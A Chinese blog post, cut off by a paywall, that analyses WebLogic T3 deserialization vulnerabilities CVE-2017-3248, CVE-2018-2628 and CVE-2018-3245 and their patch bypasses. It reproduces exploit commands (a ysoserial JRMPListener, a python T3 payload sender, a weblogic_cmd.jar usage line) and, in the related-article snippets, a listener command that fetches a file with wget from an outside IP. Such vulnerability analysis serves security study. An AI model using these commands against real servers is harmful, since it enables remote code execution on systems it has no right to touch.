weblogicT3反序列化之CVE-2017-3248&CVE-2018-2628&CVE-2018-3245

已于 2022-03-14 14:16:26 修改
阅读量6k 收藏 1
点赞数
分类专栏: 笔记 文章标签: 安全
于 2022-03-13 15:43:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/123458268
版权
本文详细分析了WebLogic T3协议中的三个安全漏洞:CVE-2017-3248、CVE-2018-2628和CVE-2018-3245。这些漏洞通过JRMP服务端与客户端的交互,利用反序列化机制,导致远程代码执行。漏洞利用的关键在于`resolveProxyClass`和`resolveClass`方法,攻击者可以通过创建特定的payload来绕过过滤,实现远程代码执行。文章还介绍了补丁分析和绕过方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

上上篇文章我们分析了CVE-2015-4852、CVE-2016-0638、CVE-2016-3510的漏洞,因果是从resolveClass方法中出现的,resolveClass方法直接继承了父类的方法,然后没有任何过滤的造成了序列化漏洞,后面两个cve都是前者的绕过。今天分析一下CVE-2017-3248 & CVE-2018-2628,上上文中我们知道readClassDesc类描述方法可分为没有代理的类和代理类,CVE-2017-3248漏洞的成因就是代理类resolveProxyClass方法。
在这里插入图片描述

CVE-2017-3248

利用原理是:
攻击机开启JRMP服务端 -》利用T3协议发送payload使得weblogic反序列化后,开启JRMP客户端,并连接服务端 -》服务端发送exp给客户端,客户端上的DGC接收到响应即会反序列化。
核心部分就是JRMP(Java Remote Method protocol),在这个PoC中会序列化一个RemoteObjectInvocationHandler,它会利用UnicastRef建立到远端的tcp连接获取RMI registry,加载回来再利用readObject解析,从而造成反序列化远程代码执行.
如果仔细分析过上篇文章的,这里的利用步骤能很容易看懂。
首先我们开启JRMP服务端:

java -cp .\ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 'touch /tmp/success'

在这里插入图片描述
利用T3协议发送payload/JRMPClient,然目标回连我们:

python2 2017-3248.py 192.168.202.129 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.202.1 9999 JRMPClient

在这里插入图片描述
发送T3协议payload的POC

python2 p2-CVE-2017-3248.py dip dport path_ysoserial jrmp_listener_ip jrmp_listener_port jrmp_client

在这里插入图片描述
漏洞分析:
上文中的payloads/JRMPClient的分析部分就是这里漏洞的分析,只不过resolveProxyClass方法,没有过滤java.rmi.registry.Registry类,造成了反序列化。

最低0.47元/天 解锁文章
web反序列化漏洞原理_CVE-2017-3248——WebLogic反序列化初探_零开始网络安全技巧
程序员六七的博客
07-16 801
安全- 安全资讯平台
weblogic反序列化漏洞 cve-2018-3245
weixin_34146986的博客
10-24 3658
weblogic反序列化漏洞 CVE-2018-3245 0x00 针对cve-2018-2893的修复 针对JRMP反序列化修复的方式依旧是增加黑名单:黑名单package:java.rmi.activation sun.rmi.server黑名单class:java.rmi.server.UnicastRemoteObject java.r...
WebLogic反序列化_CVE-2017-3248
09-06
WebLogic反序列化_CVE-2017-3248 java -jar weblogic_cmd.jar -C pwd -H 192.168.1.1 -P 7001 工具使用方法: -B Runtime Blind Execute Command maybe you should select os type -C (执行命令)Execute Command[need set] -dst path to dst file -H (执行主机)Remote Host[need set] -https enable https or tls -noExecPath custom execute path -os (操作系统类型)Os Type [windows,linux] -P (远程端口)Remote Port[need set] -shell enable shell module -src path to src file -T Payload Type[marshall, collection, streamMessageImpl] -U Uninstall rmi -upload enable upload a file
java weblogic反序列化,WebLogic 反序列化漏洞(CVE-2017-10271)
weixin_39851809的博客
03-13 151
0x00 WebLogic WLS组件反序列化漏洞这个漏洞的编号是 CVE-2017-10271,漏洞存在于 Oracle WebLogic 的 wls-wsat 组件中,该组件的 XMLDecoder 方法在反序列化时存在漏洞可远程代码执行,凡是版本号 < 10.3.6 的都受到影响,刚出来时没有看,现在记录一下0x01 访问远程文件POST /wls-wsat/CoordinatorPo...
CVE-2017-3248&CVE-2018-2628
一个安全研究员
05-27 2751
如题
WebLogic_CVE-2017-3248&&GetShell-CMD验证工具.rar
02-11
Weblogic任意命令执行的检测工具。 WebLogic_CVE-2017-3248文件夹的执行命令: java -jar weblogic_cmd.jar -C whoami -H 10.1.1.104 -P 8083 Weblogic Unserialization GetShll&CMD文件夹的执行命令: java -jar Weblogic-Unserialization-GetShll-CMD.jar 或者双击starter.bat.
CVE-2017-3248简单复现
ddr12231的博客
09-17 934
我是这样操作的 目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt" linux虚拟机上执行 python exploit-C...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它涉及到组件T3协议处理中的对象反序列化过程。该漏洞允许攻击者通过构造恶意的T3请求,远程执行任意代码,从而...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
该漏洞主要影响JBoss AS 7.x和EAP 6.x版本,这些版本中包含了`org.jboss.remoting3.protocol.ser`包,该包处理反序列化时存在缺陷。攻击者可以通过发送特制的序列化对象到服务器的RMI注册表,触发恶意代码执行。RMI...
CVE-2017-3248——WebLogic反序列化漏洞利用工具
weixin_30628801的博客
07-20 936
著名的web中间件WebLogic被曝出之前的反序列化安全漏洞补丁存在绕过安全风险,用户更新补丁后,仍然存在被绕过成功执行远程命令攻击的情况,安全风险高,Oracle官方及时发布了最新补丁,修复了该漏洞,阿里云安全团队建议用户尽快自查并升级。 具体详情如下: 漏洞编号: CVE-2017-3248 漏洞名称: WebLogic 反序列化漏洞 官方评级: 高危 漏洞描述: Or...
推荐开源项目:WebLogic CVE-2017-3248远程代码执行漏洞利用工具
最新发布
gitblog_00075的博客
06-15 499
推荐开源项目:WebLogic CVE-2017-3248远程代码执行漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 在网络安全研究的浩瀚星空中,一款名为exploit-CVE-2017-3248-bobsecq.py的脚本如星辰般璀璨。它专为针对“Oracle WebLogic RMI Registry UnicastRef对象Java反序列化远程代码执...
weblogic之CVE-2017-3248CVE-2018-2628,CVE-2018-2893CVE-2018-3245反序列绕过分析
weixin_30820151的博客
01-11 888
说一下复现CVE-2017-3248可以参考p牛的环境,p牛的环境CVE-2018-2628实际就是CVE-2017-3248,他漏洞编号这块写错了。 攻击流程就如下图,攻击者开启JRMPListener监听在1099端口,等待受害者链接,当受害者链接时,把gadgets返回给客户端: CVE-2017-3248以后的漏洞都是利用了JRMP java远程方法协议,利用java.rmi...
WebLogic反序列化漏洞(CVE-2017-3248
公众号shadow sock7
11-19 7574
参考: https://paper.seebug.org/333/ 环境安装 反弹shell参考: https://w00troot.blogspot.com/2017/05/getting-reverse-shell-from-web-shell.html weblogic在服务器命令行安装步骤参考: https://blog.csdn.net/caiqiiqi/article/details/...
weblogic漏洞分析之CVE-2017-3248 & CVE-2018-2628
洋洋的小黑屋
08-23 110
CVE-2017-3248 & CVE-2018-2628 后面的漏洞就是2017-3248的绕过而已,所以poc都一样,只是使用的payload不同 本机开启JRMP服务端 -》利用T3协议发送payload使得weblogic反序列化后,开启JRMP客户端,并连接服务端 -》服务端发送exp给客户端,客户端上的DGC接收到响应即会反序列化。 详细的细节看我的另一篇文章:ysoseri...
jenkins源码分析 —— 执行主节点的远程请求(四)
lovelife110的博客
05-18 2365
本文解析jenkins从节点执行主节点的远程请求过程的源码 从上一篇文章“接受主节点的远程请求(三)”得知,执行UserRequst是通过创建Runnable并提交到Executor,而Executor负责执行构建 执行请求 具体执行请求的代码是UserRequest类的perform()方法 protected UserResponse<RSP,EXC> perform...
weblogic反序列化漏洞描述影响范围及修复方法
weixin_55811105的博客
04-18 1429
Weblogic远程代码执行漏洞CVE- 2018-3245加固 1、漏洞描述 ①WebLogic Server中的RMI通信使用T3协议在WebLogic Server和其他Java程序(包括客户端及其他WebLogic Server实例)间传输数据(列化的类)。由于WebLogic的T3协议和Web协议共用同一个端口,因此只要能访问WebLogic就可利用T3 协议实现payload和目标服务器的通信。 ②WebLogic java反序列化漏洞( CVE-2018-3245 )是通过JRMP协议利用RM
weblogic反序列化之T3协议(CVE-2015-4582)
遇事不决冲冲冲
05-12 4672
基于T3协议的weblogic反序列化漏洞 之前说过在weblogic里面其实反序列化漏洞利用中大致分为两种,一个是基于T3协议的反序列化漏洞,一个是基于XML的反序列化漏洞,这篇来分析一下基于T3协议的weblogic,列出几个基于T3协议具有代表性的CVECVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2018-2628CVE-2020-2555、CVE-2020-2883,每个cve的思路大致都是基于上几个漏洞的补丁进行的一个绕过,本来想逐个分析,这里
linux winserver漏洞,Microsoft Windows SMB Server远程代码执行漏洞(CVE-2017-0148)
weixin_39876282的博客
05-16 2027
Microsoft Windows SMB Server远程代码执行漏洞(CVE-2017-0148)发布日期:2017-03-14更新日期:2017-04-18受影响系统:Microsoft Windows Vista SP2Microsoft Windows Server 2016Microsoft Windows Server 2012 Gold R2Microsoft Windows Se...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值